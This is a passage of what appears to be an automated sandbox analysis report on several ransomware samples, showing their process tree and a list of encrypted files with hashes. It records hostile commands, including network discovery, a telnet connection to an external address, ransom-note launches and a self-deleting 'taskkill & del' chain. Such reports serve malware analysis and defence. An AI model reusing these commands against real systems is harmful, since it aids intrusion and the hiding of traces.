                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:11928
                                                                                                                                                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                          ipconfig.EXE /all
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Gathers network information
                                                                                                                                                                                                                          PID:12256
                                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                                          find "IP"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:8748
                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                            find "10.77."
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ipconfig.EXE /all | find "IP" | find "192.168."
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:9040
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:7376
                                                                                                                                                                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                  ipconfig.EXE /all
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Gathers network information
                                                                                                                                                                                                                                  PID:7608
                                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                  find "IP"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:12216
                                                                                                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                    find "192.168."
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:8204
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig.EXE /all | find "IP" | find "10.80."
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:516
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:2740
                                                                                                                                                                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                          ipconfig.EXE /all
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Gathers network information
                                                                                                                                                                                                                                          PID:7696
                                                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                          find "IP"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:10408
                                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                            find "10.80."
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:7712
                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                            ping 192.168.0.40
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:11320
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\telnet.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\\telnet.exe 91.220.188.200 61911
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:11416
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\telnet.exe
                                                                                                                                                                                                                                              telnet.exe 91.220.188.200 61911
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:7164
                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Zerber.jcb-28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e.exe
                                                                                                                                                                                                                                            Trojan-Ransom.Win32.Zerber.jcb-28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e.exe
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:8488
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:11912
                                                                                                                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:9844
                                                                                                                                                                                                                                                    • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:10556
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        /d /c taskkill /t /f /im "ReAgentc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe" > NUL
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                        PID:8644
                                                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                          taskkill /t /f /im "ReAgentc.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:5724
                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                          ping -n 1 127.0.0.1
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                          PID:8220
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.jcb-28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Zerber.jcb-28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e.exe" > NUL
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                      PID:7404
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                        taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.jcb-28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e.exe"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                        PID:6808
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        ping -n 1 127.0.0.1
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:10600
                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00402\UDS-Trojan-Ransom.Win32.Encoder-9d46ce34557f9a89826c3d8db489681f7f84e84fa07d41569855d600e3747a3a.exe
                                                                                                                                                                                                                                                    UDS-Trojan-Ransom.Win32.Encoder-9d46ce34557f9a89826c3d8db489681f7f84e84fa07d41569855d600e3747a3a.exe
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6724
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\130443.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\130443.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:11052
                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00402\VHO-Trojan-Ransom.MSIL.Encoder.gen-5845f4a98a8f35c950050bdc18dd312c5bb70941407c15df0c87fdf349533668.exe
                                                                                                                                                                                                                                                        VHO-Trojan-Ransom.MSIL.Encoder.gen-5845f4a98a8f35c950050bdc18dd312c5bb70941407c15df0c87fdf349533668.exe
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5068
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 940
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:4948
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2460 -ip 2460
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:860
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3056 -ip 3056
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4800
                                                                                                                                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:2928
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5444 -ip 5444
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5264 -ip 5264
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:9108
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Trojan-Ransom.Win32.Avaddon.o-cd367626c1f1475de5974556b18e067f08706013e17193a0ffacb3966ce91c35.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Trojan-Ransom.Win32.Avaddon.o-cd367626c1f1475de5974556b18e067f08706013e17193a0ffacb3966ce91c35.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6880
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7512 -ip 7512
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:6388
                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:10344
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5068 -ip 5068
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6208
                                                                                                                                                                                                                                                                      • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                        werfault.exe /h /shared Global\e74cc3ca90504c1e9c8a8f2b5a72e999 /t 9068 /p 6512
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:9316
                                                                                                                                                                                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                          werfault.exe /h /shared Global\c99acd6a4efe461ebf810859d6058ff6 /t 11504 /p 11444
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:1080
                                                                                                                                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x500 0x470
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:10156
                                                                                                                                                                                                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6120
                                                                                                                                                                                                                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:11652
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8024
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\9597fr48-readme.txt
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:12092
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:7500
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10068 -ip 10068
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:6512
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Notepad.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:12228

                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                          • C:\$Recycle.Bin\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            129B

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\38582cbd\jusched.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            206KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            af030c00ac2817a4243c17bffeefaede

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            d5abb58158d57ead6642faf1692ebf28195cafd8

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            b1ebdcd090c6e5a7b681a5a8599bca6a953dc2af2b7015e175edd495b104c2df

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            0df01ffaa1485a35ccb4a36d45b34195323357d0d3be2eb32c183547a623c277bbabcef01bf0170fe3dae70b96403a2c99e9f4d81899c466a868a733fc5948a1

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe.id-38582C86.[[email protected]].ROGER
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.9MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            8b34ff9a9ac96ba75ddcf0954086725f

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            db92114240e30ef7b7179844d1a7c8a9e3a1b636

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            352d66a885bc8b059f2169b4f6e500fc12f283b2f209e09470b881a5ce6df4c9

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            527ba2de9103d986ea8b84a966dc1b0f699f5a59884070ad7335d49071d36185248e53bd973b0c8514bdd94f9a5134356b06ee4066b365df9299d36fd65b6c98

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Data.Common.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.6MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            2b385616a65ae7051c978346690c5fc4

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            f84019a041acf94a60036063d3862d83e5465f85

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            f86a279dcf9103ad2905cea68f05a100d37e8f549ae859d163e1c10cd2bf2c70

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            0b8af462be989306dec0c6befed267a48a5b22b9df9c7fa303c01ce776c6d195543c6217bea87db359dbaccb19509faadef7ce1c7b6c49961f13d5dce3503252

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Private.Xml.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            8.8MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            f28c57a67b4421a345882dbc3e314a50

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            3e1292b3333d1793851aa71498c518bb1f8b0386

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            759a1a83631c450889fbdf1382eda6ce0c93e78665894d87b9d01ee7228b874a

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            204e7ae22bdd8693e154c949750f8a3d9e0d379d57c05b80f77b84a4890db5584a559a8fbd59c1491fca9cd9b3ce0fe174edff31c0786c04b77513e7a5f992b1

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.5MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            f16d800c512b5a0c9b617342ab110550

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            c0e270fb8494c9010a9ccd0bc5a9f5a940f02d52

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            bd58bca42822620c4e7741fa2b59107750009dbe302e826dd4f72ae307d192ee

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            00c83eb455c5b02ca6affdb8427826b0e4a8673c4d99d1f94f733bbf9bc31eb738726955f960cc9175d19213a92e8e3aea1f8dbca1ea4b5d885b61f786435f2d

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Net.Http.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.4MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            c7083877ec33dc297dc51c568c416f0a

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            47a75998ed2f142b5a1e1ae005d9190bedb7df02

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            0d4167d4aee98a4fdcefbed3e2781f6ac5f61aa77772160b1b0e84ba4a62e717

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            b05b2939c34a8840bb785e0b677b669ff6c3a7a35f52915c404841ebc3105b2ba8a0cde6bc403c8670a1d477f9a32a97ec67bace4036bfe1b350bcd985c54143

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\PresentationFramework.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            16.2MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            0e5c0330cb20f7543bfdaf5c8a44cdfd

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            05953750d5f092d2960a3585c7d72d68f60fe49b

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            85e45215064d433a07b526dd2fc792d9c7ba4ee9dafecd79eadb005c8a494c10

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            211faf359fb006aed6f036823b92dea7e4b3320b9343732620924faecdaf5642b779ec1e08fd7ce5ef86240b2a8d22ff86aab20ec83eb5d85d104a6538173623

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\WindowsBase.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.9MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            077b964381ec87c88f3211000e15d6a4

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            a4659f291e8aaf2137f9daa857c630f16b73489d

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            487d3cb4ae118c1770ff084584381f4763d4147126758fb5de78f4f91db3934b

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            bf67d0d800a72e2210a5957bc43f0b891fc52c88a1472af2081abfb6afc2f83ab9af7b0acd9f3c0e7b7fa0cc0f19ceba837f2f8e5cfe486846f1b48c1481cc04

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\wpfgfx_cor3.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.6MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            6d4514983b8bde0e7100991a1c4d1ca0

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            c42d4a50355b2dc26f8c0c4a639854b96f1f067c

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            790fcf6060791af0e6d06c57227f1ed50176ce2f914f6b8a4e98add8af46bd1c

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            2837ef73b91fca1a310542f5211b960ad16c9c400e7cd4b1bd244abfb70174eac3e1501e42a62f8f3cb89831f4e32c51f81071d921685feccb5c2376202c57ae

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ReachFramework.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.3MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            484ee9bd19b1912ff89ed33a22ff1ca0

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            a9dfad27f40d7a9b710f14a0795ad5e7a9a5fc1b

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            7fbf65124bdac0c062085c8fbaf133337d1d2654141e71a01d9fcd79fe3b4c17

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            cf26e5e177950eb50bbcfb9d05de675087d089976ba176917c31a745f2174e7f7f5bbd873598680d7f69bceef876504c91147abff56cf9e0e5054b4e922596da

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\System.Windows.Forms.dll.id-38582C86.[[email protected]].ROGER.cxkkz
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            13.7MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            b2d8fb32db1d3d6a2045fdbcb0331e1c

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            41514d064f0d9d5ce73f3af058f7e9dc9c33a58e

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            d5bdaf9358ed2d9a24f4f17388523edc0862d75097829ae05a76702a8cf891c5

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            c50569f9f53c01e03334bba508d37730a2b06ab88417f6c00a3d815c42decfc3b87c8d7787f7828cb020908402d050c64c06322d84d6fdf74e506aab7144ef73

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\9597fr48-readme.txt
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            547577bd45876d3a664abd0deebab7ce

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            1882cf562802fa066a87491c61a4ced1cb2df3dd

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            c42e06e757a77cd83dd0fcfa188ecec8da57257c368bd1f0740d37fa3fe5551d

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            650dfc6b3554f0b570a93eb7e83e2ab409c441cc0fbbadbd0a8b2875e01da732f9012273c8d9e714e72efccde34d863dd922f9063fea7e28cfc329fb3fafeeed

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                                                                                                            Download Submit

